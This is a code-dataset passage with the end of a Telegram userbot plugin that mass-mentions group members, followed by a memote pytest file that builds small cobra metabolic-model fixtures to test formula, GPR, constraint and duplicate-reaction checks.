                await event.client.get_participants(chat),
            ),
        )
        jumlah = []
        # Walk participants in packs of five; checking the flag each
        # iteration lets `.restart` abort the run.
        # NOTE(review): same pattern as the emojitag handler - each full
        # pack of 5 overwrites `tags` and only one message is sent after
        # the loop, so the final partial pack is never tagged; confirm.
        async for participant in event.client.iter_participants(chat):
            if not FlagContainer.is_active:
                break
            jumlah.append(participant)
            if len(jumlah) == 5:
                tags = list(
                    map(
                        lambda m: f"[{m.first_name}](tg://user?id={m.id})",
                        jumlah,
                    ),
                )
                jumlah = []
        if text:
            tags.append(text)
        await event.client.send_message(event.chat_id, " ".join(tags))
        # Brief pause to avoid Telegram flood limits.
        await asyncio.sleep(2)
    finally:
        # Always release the re-entry guard, even on error/abort.
        FlagContainer.is_active = False
CMD_HELP.update(
{
"tag": f"**Plugin : **`tag`\
\n\n โข **Syntax :** `{cmd}mention`\
\n โข **Function : **Untuk Menmention semua anggota yang ada di group tanpa menyebut namanya.\
\n\n โข **Syntax :** `{cmd}all` <text>\
\n โข **Function : **Untuk Mengetag semua anggota Maksimal 3.000 orang yg akan ditag di grup untuk mengurangi flood wait telegram.\
\n\n โข **Syntax :** `{cmd}emojitag` <text>\
\n โข **Function : **Untuk Mengetag semua anggota di grup dengan random emoji berbeda.\
\n\n โข **NOTE :** Untuk Memberhentikan Tag ketik `.restart`\
"
}
)
| 34.027397 | 607 | 0.47504 |
ace8d22bce0aca426103ab422fe556a77501a0c9 | 33,087 | py | Python | tests/test_for_support/test_for_basic.py | matthiaskoenig/memote | 7c14cd304523dda83eaf4835ee007243e8673f85 | [
"Apache-2.0"
] | null | null | null | tests/test_for_support/test_for_basic.py | matthiaskoenig/memote | 7c14cd304523dda83eaf4835ee007243e8673f85 | [
"Apache-2.0"
] | null | null | null | tests/test_for_support/test_for_basic.py | matthiaskoenig/memote | 7c14cd304523dda83eaf4835ee007243e8673f85 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2016 Novo Nordisk Foundation Center for Biosustainability,
# Technical University of Denmark.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ensure the expected functioning of ``memote.support.basic``."""
from __future__ import absolute_import
import cobra
import pytest
import memote.support.basic as basic
import memote.support.helpers as helpers
from memote.utils import register_with
MODEL_REGISTRY = dict()
@register_with(MODEL_REGISTRY)
def three_missing(base):
    """Provide a model with three metabolites lacking formula and charge."""
    metabolites = []
    for index in range(1, 4):
        metabolites.append(cobra.Metabolite(id="M{0:d}".format(index)))
    base.add_metabolites(metabolites)
    return base
@register_with(MODEL_REGISTRY)
def three_present(base):
    """Provide a model with three metabolites carrying formula and charge."""
    metabolites = []
    for index in range(1, 4):
        met = cobra.Metabolite(
            id="M{0:d}".format(index), formula="CH4", charge=-1)
        metabolites.append(met)
    base.add_metabolites(metabolites)
    return base
@register_with(MODEL_REGISTRY)
def gpr_present(base):
    """Provide a model whose single reaction carries a GPR rule."""
    substrate = cobra.Metabolite("met2")
    product = cobra.Metabolite("met1")
    reaction = cobra.Reaction("RXN1")
    reaction.add_metabolites({substrate: -1, product: 1})
    reaction.gene_reaction_rule = 'gene1 or gene2'
    base.add_reactions([reaction])
    return base
@register_with(MODEL_REGISTRY)
def gpr_present_complex(base):
"""Provide a model with reactions that all have GPR"""
rxn_1 = cobra.Reaction("RXN1")
rxn_1.gene_reaction_rule = 'gene1 and gene2'
rxn_2 = cobra.Reaction("RXN2")
rxn_2.gene_reaction_rule = '(gene4 and gene7) or ' \
'(gene9 and (gene10 or gene14))'
rxn_3 = cobra.Reaction("RXN3")
rxn_3.gene_reaction_rule = 'gene1 and gene2'
base.add_reactions([rxn_1, rxn_2, rxn_3])
return base
@register_with(MODEL_REGISTRY)
def gpr_missing(base):
    """Provide a model whose single reaction has no GPR rule."""
    substrate = cobra.Metabolite("met2")
    product = cobra.Metabolite("met1")
    reaction = cobra.Reaction("RXN1")
    reaction.add_metabolites({substrate: -1, product: 1})
    base.add_reactions([reaction])
    return base
@register_with(MODEL_REGISTRY)
def gpr_missing_with_exchange(base):
"""Provide a model reactions that lack GPR"""
rxn_1 = cobra.Reaction("RXN1")
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_2 = cobra.Reaction("EX_met1_c")
met_1 = cobra.Metabolite("met1")
rxn_2.add_metabolites({met_1: 1})
base.add_reactions([rxn_1, rxn_2])
return base
@register_with(MODEL_REGISTRY)
def gpr_present_not_lumped(base):
"""Provide a model with reactions that all have GPR"""
rxn_1 = cobra.Reaction("RXN1")
rxn_1.gene_reaction_rule = 'gene1'
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def unconstrained_rxn(base):
"""Provide a model with one unconstrained reaction"""
rxn_1 = cobra.Reaction("RXN1")
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_1.bounds = -1000, 1000
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def irreversible_rxn(base):
"""Provide a model with one irreversible reaction"""
rxn_1 = cobra.Reaction("RXN1")
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_1.bounds = 0, 1000
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def zero_constrained_rxn(base):
"""Provide a model with one zero-constrained reaction"""
rxn_1 = cobra.Reaction("RXN1")
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_1.bounds = 0, 0
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def nonzero_constrained_rxn(base):
"""Provide a model with one nonzero-constrained reaction"""
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
met_3 = cobra.Metabolite("met3")
met_4 = cobra.Metabolite("met4")
rxn_1 = cobra.Reaction("RXN1")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_2 = cobra.Reaction("RXN2")
rxn_2.add_metabolites({met_2: -1, met_3: -1})
rxn_3 = cobra.Reaction("RXN3")
rxn_3.add_metabolites({met_3: -1, met_4: 1})
rxn_1.bounds = -1000, 1000
rxn_2.bounds = -1000, 1000
rxn_3.bounds = 0, 10
base.add_reactions([rxn_1, rxn_2, rxn_3])
return base
@register_with(MODEL_REGISTRY)
def no_nonzero_constrained_rxn(base):
"""Provide a model with no nonzero-constrained reactions"""
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
met_3 = cobra.Metabolite("met3")
met_4 = cobra.Metabolite("met4")
rxn_1 = cobra.Reaction("RXN1")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_2 = cobra.Reaction("RXN2")
rxn_2.add_metabolites({met_2: -1, met_3: -1})
rxn_3 = cobra.Reaction("RXN3")
rxn_3.add_metabolites({met_3: -1, met_4: 1})
rxn_1.bounds = -1000, 1000
rxn_2.bounds = -1000, 1000
rxn_3.bounds = 0, 1000
base.add_reactions([rxn_1, rxn_2, rxn_3])
return base
@register_with(MODEL_REGISTRY)
def ngam_present(base):
    """Provide a model with a correct NGAM reaction"""
    # ATP hydrolysis participants: atp + h2o -> adp + h + pi (cytosol).
    met_g = cobra.Metabolite("atp_c", "C10H12N5O13P3", compartment="c")
    met_h = cobra.Metabolite("adp_c", "C10H12N5O10P2", compartment="c")
    met_i = cobra.Metabolite("h_c", "H", compartment="c")
    met_j = cobra.Metabolite("h2o_c", "H2O", compartment="c")
    met_k = cobra.Metabolite("pi_c", "HO4P", compartment="c")
    rxn_1 = cobra.Reaction("ATPM", name="non-growth associated maintenance")
    rxn_1.add_metabolites({met_g: -1, met_h: 1, met_i: 1, met_j: -1, met_k: 1})
    # A positive lower bound forces maintenance flux through the reaction.
    rxn_1.lower_bound = 8.39
    base.add_reactions([rxn_1])
    return base
@register_with(MODEL_REGISTRY)
def ngam_and_atpsynthase(base):
"""Provide a model with an ATP hydrolysis and an NGAM reaction"""
met_g = cobra.Metabolite("atp_c", "C10H12N5O13P3", compartment="c")
met_h = cobra.Metabolite("adp_c", "C10H12N5O10P2", compartment="c")
met_i = cobra.Metabolite("h_e", "H", compartment="e")
met_j = cobra.Metabolite("h2o_c", "H2O", compartment="c")
met_k = cobra.Metabolite("pi_c", "HO4P", compartment="c")
met_l = cobra.Metabolite("h_c", "H", compartment="c")
rxn_1 = cobra.Reaction("ATPS", name="ATPase cytosolic")
rxn_1.add_metabolites({met_g: -1, met_h: 1, met_i: 1, met_j: -1, met_k: 1})
rxn_1.bounds = -1000, 1000
rxn_2 = cobra.Reaction("NGAM", name="non-growth associated maintenance")
rxn_2.add_metabolites({met_g: -1, met_h: 1, met_l: 1, met_j: -1, met_k: 1})
rxn_2.bounds = 0, 1000
base.add_reactions([rxn_1, rxn_2])
return base
@register_with(MODEL_REGISTRY)
def sufficient_compartments(base):
"""Provide a model with the minimal amount of compartments"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("a_p", compartment="p")
met_c = cobra.Metabolite("a_e", compartment="e")
rxn_a_b = cobra.Reaction("AB")
rxn_a_b.add_metabolites({met_a: 1, met_b: -1})
rxn_b_c = cobra.Reaction("BC")
rxn_b_c.add_metabolites({met_b: 1, met_c: -1})
base.add_reactions([rxn_b_c, rxn_a_b])
return base
@register_with(MODEL_REGISTRY)
def insufficient_compartments(base):
"""Provide a model with less than the minimal amount of compartments"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_c = cobra.Metabolite("a_e", compartment="e")
rxn_a_c = cobra.Reaction("AC")
rxn_a_c.add_metabolites({met_a: 1, met_c: -1})
base.add_reactions([rxn_a_c])
return base
@register_with(MODEL_REGISTRY)
def non_metabolic_reactions(base):
"""Provide a model all kinds of reactions that are not purely metabolic"""
met_a = cobra.Metabolite("a_c", formula='CH4', compartment="c")
met_c = cobra.Metabolite("a_e", formula='CH4', compartment="e")
rxn_a_c = cobra.Reaction("AC")
rxn_a_c.add_metabolites({met_a: 1, met_c: -1})
biomass = cobra.Reaction("BIOMASS")
ex_a = cobra.Reaction("EX_a_e")
ex_a.add_metabolites({met_c: -1})
base.add_reactions([rxn_a_c, biomass, ex_a])
return base
@register_with(MODEL_REGISTRY)
def transport_gpr(base):
"""Provide a model with a transport reaction without GPR."""
met_a = cobra.Metabolite("co2_c", formula='CO2', compartment="c")
met_b = cobra.Metabolite("co2_e", formula='CO2', compartment="e")
met_c = cobra.Metabolite("na_c", formula='Na', compartment="c")
met_d = cobra.Metabolite("na_e", formula='Na', compartment="e")
uni = cobra.Reaction("UNI")
uni.gene_reaction_rule="X and Y"
uni.add_metabolites({met_a: 1, met_b: -1})
anti = cobra.Reaction("ANTI")
anti.gene_reaction_rule = "W or V"
anti.add_metabolites({met_a: 1, met_d: 1, met_b: -1, met_c: -1})
sym = cobra.Reaction("SYM")
sym.add_metabolites({met_a: 1, met_c: 1, met_b: -1, met_d: -1})
base.add_reactions([uni, anti, sym])
return base
@register_with(MODEL_REGISTRY)
def transport_gpr_constrained(base):
"""Provide a model with a constrained transport reaction without GPR."""
met_a = cobra.Metabolite("co2_c", formula='CO2', compartment="c")
met_b = cobra.Metabolite("co2_e", formula='CO2', compartment="e")
met_c = cobra.Metabolite("na_c", formula='Na', compartment="c")
met_d = cobra.Metabolite("na_e", formula='Na', compartment="e")
uni = cobra.Reaction("UNI")
uni.gene_reaction_rule="X and Y"
uni.add_metabolites({met_a: 1, met_b: -1})
anti = cobra.Reaction("ANTI")
anti.gene_reaction_rule = "W or V"
anti.add_metabolites({met_a: 1, met_d: 1, met_b: -1, met_c: -1})
sym = cobra.Reaction("SYM")
sym.add_metabolites({met_a: 1, met_c: 1, met_b: -1, met_d: -1})
sym.lower_bound = 8.39
base.add_reactions([uni, anti, sym])
return base
@register_with(MODEL_REGISTRY)
def reversible_oxygen_flow(base):
"""Provide a model with a reversible oxygen-containing reaction."""
met_a = cobra.Metabolite("o2s_e", formula="O2", compartment="e")
met_b = cobra.Metabolite("o2s_p", formula="O2", compartment="p")
rxn = cobra.Reaction("O2Stex")
rxn.add_metabolites({met_a: -1, met_b: 1})
rxn.lower_bound = -1000
rxn.upper_bound = 1000
base.add_reactions([rxn])
return base
@register_with(MODEL_REGISTRY)
def non_reversible_oxygen_flow(base):
"""Provide a model with a non-reversible oxygen-containing reaction."""
met_a = cobra.Metabolite("o2s_c", formula="O2", compartment="c")
met_b = cobra.Metabolite("o2_c", formula="O2", compartment="c")
met_c = cobra.Metabolite("h2o2_c", formula='H2O2', compartment="c")
met_i = cobra.Metabolite("h_c", "H", compartment="c")
rxn = cobra.Reaction("SPODM")
rxn.add_metabolites({met_a: -2, met_b: 1, met_c: 1, met_i: -2})
rxn.lower_bound = 0
rxn.upper_bound = 0
base.add_reactions([rxn])
return base
@register_with(MODEL_REGISTRY)
def dup_mets_in_c(base):
"""Provide a model with duplicate metabolites in the same compartment"""
met_a = cobra.Metabolite("a_c", compartment="c")
dup_a = cobra.Metabolite("x_c", compartment="c")
not_a = cobra.Metabolite("b_c", compartment="c")
met_a.annotation["inchikey"] = "1231"
met_a.annotation["kegg"] = "123"
dup_a.annotation["inchikey"] = "1231"
dup_a.annotation["kegg"] = "123"
not_a.annotation["inchikey"] = "3211"
not_a.annotation["kegg"] = "321"
met_b = cobra.Metabolite("a_p", compartment="p")
met_c = cobra.Metabolite("a_e", compartment="e")
rxn_a_b = cobra.Reaction("AB")
rxn_a_b.add_metabolites({dup_a: 1, met_a: 1, met_b: -1})
rxn_b_c = cobra.Reaction("BC")
rxn_b_c.add_metabolites({not_a: 1, met_b: 1, met_c: -1})
base.add_reactions([rxn_b_c, rxn_a_b])
return base
@register_with(MODEL_REGISTRY)
def dup_mets_in_c_wrong_annotation(base):
"""Provide a model like `dup_mets_in_c` but with improper annotations"""
met_a = cobra.Metabolite("a_c", compartment="c")
dup_a = cobra.Metabolite("x_c", compartment="c")
not_a = cobra.Metabolite("b_c", compartment="c")
met_a.annotation["kegg"] = "123"
dup_a.annotation["kegg"] = "123"
not_a.annotation["kegg"] = "321"
met_b = cobra.Metabolite("a_p", compartment="p")
met_c = cobra.Metabolite("a_e", compartment="e")
rxn_a_b = cobra.Reaction("AB")
rxn_a_b.add_metabolites({dup_a: 1, met_a: 1, met_b: -1})
rxn_b_c = cobra.Reaction("BC")
rxn_b_c.add_metabolites({not_a: 1, met_b: 1, met_c: -1})
base.add_reactions([rxn_b_c, rxn_a_b])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns(base):
"""Provide a model with duplicate reactions"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
met_a.annotation["inchikey"] = "123"
met_b.annotation["inchikey"] = "456"
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX"
dup_1.annotation["kegg.reaction"] = "HEX"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_multiple_anns(base):
"""Provide a model like `dup_rxns` but with multiple annotations per rxn"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX"
rxn_1.annotation["metanetx.reaction"] = "MNXR1"
dup_1.annotation["kegg.reaction"] = "HEX"
dup_1.annotation["metanetx.reaction"] = "MNXR1"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_partial_matching_multiple_anns(base):
"""Provide a model like `dup_rxns_multiple_anns` but with partial matches"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX"
rxn_1.annotation["metanetx.reaction"] = "MNXR1"
dup_1.annotation["kegg.reaction"] = "HEX"
dup_1.annotation["metanetx.reaction"] = "MNXR2"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_no_matching_multiple_anns(base):
"""Provide a model like `dup_rxns_multiple_anns` but with no matches"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX11"
rxn_1.annotation["metanetx.reaction"] = "MNXR11"
dup_1.annotation["kegg.reaction"] = "HEX22"
dup_1.annotation["metanetx.reaction"] = "MNXR22"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_list_anns(base):
"""Provide a model like `dup_rxns` but with list annotations"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = ["HEX11", "HEX22"]
dup_1.annotation["kegg.reaction"] = "HEX22"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_multiple_list_anns(base):
"""Provide a model like `dup_rxns_multiple_anns` but with list anns"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = ["HEX11", "HEX22"]
dup_1.annotation["kegg.reaction"] = ["HEX22", "HEX11"]
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_multiple_list_anns_no_match(base):
"""Provide a model like `dup_rxns_multiple_list_anns` but with no match"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = ["HEX111", "HEX222"]
dup_1.annotation["kegg.reaction"] = ["HEX221", "HEX112"]
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def rxns_no_exchange(base):
"""Provide a model with no exchange reactions"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
rxn_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def rxns_with_two_substrates(base):
"""Provide a model with two substrates that can be taken up"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
met_c = cobra.Metabolite("c_e", compartment="e")
met_d = cobra.Metabolite("d_e", compartment="e")
rxn_1 = cobra.Reaction("rxn1")
rxn_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1])
base.add_boundary(
met_c, type="custom", reaction_id="EX_c", lb=-1000, ub=1000)
base.add_boundary(
met_d, type="custom", reaction_id="EX_d", lb=-1000, ub=1000)
return base
@register_with(MODEL_REGISTRY)
def rxns_with_two_false_substrates(base):
"""Provide a model with two false substrates that cannot be taken up"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
met_c = cobra.Metabolite("c_e", compartment="c")
met_d = cobra.Metabolite("d_e", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
rxn_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1])
base.add_boundary(met_c, type="custom", reaction_id="EX_c", lb=1, ub=1000)
base.add_boundary(met_d, type="custom", reaction_id="EX_d", lb=1, ub=1000)
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_compartment(base):
"""Provide a model with identical reactions in different compartments."""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
met_c = cobra.Metabolite("a_m", compartment="m")
met_d = cobra.Metabolite("b_m", compartment="m")
met_a.annotation["inchikey"] = "123"
met_b.annotation["inchikey"] = "456"
met_c.annotation["inchikey"] = "123"
met_d.annotation["inchikey"] = "456"
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX"
dup_1.annotation["kegg.reaction"] = "HEX"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_c: -1, met_d: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_irrev(base):
"""
Provide a model with oppositely directional but irreversible reactions.
"""
met_a = cobra.Metabolite("h2o_c", compartment="c")
met_b = cobra.Metabolite("methf_c", compartment="c")
met_c = cobra.Metabolite("5fthf_c", compartment="c")
met_d = cobra.Metabolite("h_c", compartment="c")
met_a.annotation["inchikey"] = "123"
met_b.annotation["inchikey"] = "456"
met_c.annotation["inchikey"] = "789"
met_d.annotation["inchikey"] = "111"
FOMETRi = cobra.Reaction("FOMETRi")
THFAT = cobra.Reaction("THFAT")
FOMETRi.annotation["kegg.reaction"] = "R02300"
FOMETRi.annotation["brenda"] = "2.1.2.10"
THFAT.annotation["kegg.reaction"] = "R02300"
THFAT.annotation["brenda"] = "2.1.2.10"
FOMETRi.add_metabolites({met_c: 1, met_d: 1, met_a: -1, met_b: -1})
THFAT.add_metabolites({met_c: -1, met_d: -1, met_a: 1, met_b: 1})
base.add_reactions([FOMETRi, THFAT])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_rev(base):
"""
Provide a model with oppositely directional but reversible reactions.
"""
met_a = cobra.Metabolite("h2o_c", compartment="c")
met_b = cobra.Metabolite("methf_c", compartment="c")
met_c = cobra.Metabolite("5fthf_c", compartment="c")
met_d = cobra.Metabolite("h_c", compartment="c")
met_a.annotation["inchikey"] = "123"
met_b.annotation["inchikey"] = "456"
met_c.annotation["inchikey"] = "789"
met_d.annotation["inchikey"] = "111"
FOMETRi = cobra.Reaction("FOMETRi", upper_bound=1000, lower_bound=-1000)
THFAT = cobra.Reaction("THFAT", upper_bound=1000, lower_bound=-1000)
FOMETRi.annotation["kegg.reaction"] = "R02300"
FOMETRi.annotation["brenda"] = "2.1.2.10"
THFAT.annotation["kegg.reaction"] = "R02300"
THFAT.annotation["brenda"] = "2.1.2.10"
FOMETRi.add_metabolites({met_c: 1, met_d: 1, met_a: -1, met_b: -1})
THFAT.add_metabolites({met_c: -1, met_d: -1, met_a: 1, met_b: 1})
base.add_reactions([FOMETRi, THFAT])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_irrev_exchanges(base):
    """
    Provide a model with duplicate exchanges.
    """
    met_a = cobra.Metabolite("A_c", compartment="c")
    met_a.annotation["inchikey"] = "123"
    exchanges = []
    # Two distinct reaction IDs producing the same metabolite -> duplicates.
    for rxn_id in ("ex1", "ex2"):
        exchange = cobra.Reaction(rxn_id, upper_bound=1000, lower_bound=0)
        exchange.add_metabolites({met_a: 1})
        exchanges.append(exchange)
    base.add_reactions(exchanges)
    return base
@register_with(MODEL_REGISTRY)
def identical_genes(base):
    """Provide a model with reactions with identical genes."""
    met_1 = cobra.Metabolite("met1")
    met_2 = cobra.Metabolite("met2")
    reactions = []
    # Both reactions carry the exact same GPR and stoichiometry.
    for rxn_id in ("RXN1", "NXR"):
        rxn = cobra.Reaction(rxn_id)
        rxn.gene_reaction_rule = 'gene1 or gene2'
        rxn.add_metabolites({met_1: 1, met_2: -1})
        reactions.append(rxn)
    base.add_reactions(reactions)
    return base
@register_with(MODEL_REGISTRY)
def different_genes(base):
    """Provide a model with reactions with different genes."""
    met_1 = cobra.Metabolite("met1")
    met_2 = cobra.Metabolite("met2")
    reactions = []
    # Same stoichiometry, but each reaction has its own gene rule.
    for rxn_id, gpr in (("RXN1", 'b2912'), ("NXR", 'b2551')):
        rxn = cobra.Reaction(rxn_id)
        rxn.gene_reaction_rule = gpr
        rxn.add_metabolites({met_1: 1, met_2: -1})
        reactions.append(rxn)
    base.add_reactions(reactions)
    return base
@pytest.mark.parametrize("model, num", [
    ("empty", 0),
    ("three_missing", 3),
    ("three_present", 0)
], indirect=["model"])
def test_metabolites_formula_presence(model, num):
    """Expect exactly `num` metabolites to lack a formula."""
    missing_formula = basic.check_metabolites_formula_presence(model)
    assert len(missing_formula) == num
@pytest.mark.parametrize("model, num", [
    ("empty", 0),
    ("three_missing", 3),
    ("three_present", 0)
], indirect=["model"])
def test_metabolites_charge_presence(model, num):
    """Expect exactly `num` metabolites to lack a charge."""
    missing_charge = basic.check_metabolites_charge_presence(model)
    assert len(missing_charge) == num
@pytest.mark.parametrize("model, num", [
    ("empty", 0),
    ("gpr_present", 0),
    ("gpr_missing", 1),
    ("gpr_missing_with_exchange", 1),
], indirect=["model"])
def test_gene_protein_reaction_rule_presence(model, num):
    """Expect exactly `num` non-exchange reactions without a GPR."""
    missing_gpr = set(basic.check_gene_protein_reaction_rule_presence(model))
    # Boundary (exchange) reactions legitimately have no GPR.
    missing_gpr -= set(model.boundary)
    assert len(missing_gpr) == num
@pytest.mark.parametrize("model, coverage", [
    pytest.param("empty", 0,
                 marks=pytest.mark.raises(exception=ValueError)),
    ("gpr_present", 0.5),
    ("gpr_present_not_lumped", 1),
], indirect=["model"])
def test_metabolic_coverage(model, coverage):
    """Expect metabolic coverage of at least `coverage`."""
    assert basic.calculate_metabolic_coverage(model) >= coverage
@pytest.mark.parametrize("model, num", [
    ("empty", 0),
    ("unconstrained_rxn", 0),
    ("nonzero_constrained_rxn", 1),
    ("no_nonzero_constrained_rxn", 0),
], indirect=["model"])
def test_find_nonzero_constrained_reactions(model, num):
    """Expect exactly `num` non-zero constrained reactions."""
    assert len(basic.find_nonzero_constrained_reactions(model)) == num
@pytest.mark.parametrize("model, num", [
    ("empty", 0),
    ("unconstrained_rxn", 0),
    ("zero_constrained_rxn", 1),
], indirect=["model"])
def test_find_zero_constrained_reactions(model, num):
    """Expect exactly `num` zero-constrained reactions."""
    assert len(basic.find_zero_constrained_reactions(model)) == num
@pytest.mark.parametrize("model, num", [
    ("empty", 0),
    ("unconstrained_rxn", 0),
    ("irreversible_rxn", 1),
], indirect=["model"])
def test_find_irreversible_reactions(model, num):
    """Expect exactly `num` irreversible reactions."""
    assert len(basic.find_irreversible_reactions(model)) == num
@pytest.mark.parametrize("model, num", [
    ("empty", 0),
    ("unconstrained_rxn", 1),
    ("zero_constrained_rxn", 0),
], indirect=["model"])
def test_find_unconstrained_reactions(model, num):
    """Expect exactly `num` unconstrained reactions."""
    assert len(basic.find_unconstrained_reactions(model)) == num
@pytest.mark.parametrize("model, num", [
    ("ngam_present", 1),
    ("ngam_and_atpsynthase", 1)
], indirect=["model"])
def test_ngam_presence(model, num):
    """Expect exactly one non growth-associated maintenance reaction."""
    assert len(basic.find_ngam(model)) == num
@pytest.mark.parametrize("model, boolean", [
    ("sufficient_compartments", True),
    ("insufficient_compartments", False)
], indirect=["model"])
def test_compartments_presence(model, boolean):
    """Expect the three-compartment threshold check to equal `boolean`."""
    compartment_count = len(model.compartments)
    assert (compartment_count >= 3) == boolean
@pytest.mark.parametrize("model, num", [
    ("gpr_present", 0),
    ("gpr_missing", 0),
    ("gpr_present_complex", 3)
], indirect=["model"])
def test_find_protein_complexes(model, num):
    """Expect exactly `num` reactions catalyzed by protein complexes."""
    complexes = basic.find_protein_complexes(model)
    assert len(complexes) == num
# TODO: ngam_and_atpsynthase is not a proper positive control test model
# It needs to be replaced with a new test.
@pytest.mark.parametrize("model, num", [
    ("ngam_and_atpsynthase", 2),
    ("gpr_missing_with_exchange", 1),
    ("non_metabolic_reactions", 0)
], indirect=["model"])
def test_find_pure_metabolic_reactions(model, num):
    """Expect exactly `num` purely metabolic reactions."""
    pure = basic.find_pure_metabolic_reactions(model)
    assert len(pure) == num
@pytest.mark.parametrize("model, num", [
    ("ngam_present", 1),
    ("ngam_and_atpsynthase", 0),
    ("non_metabolic_reactions", 0)
], indirect=["model"])
def test_find_constrained_pure_metabolic_reactions(model, num):
    """Expect exactly `num` constrained purely metabolic reactions."""
    pmr = basic.find_pure_metabolic_reactions(model)
    constrained = {
        rxn for rxn in pmr if basic.is_constrained_reaction(model, rxn)}
    assert len(constrained) == num
@pytest.mark.parametrize("model, num", [
    ("transport_gpr_constrained", 1),
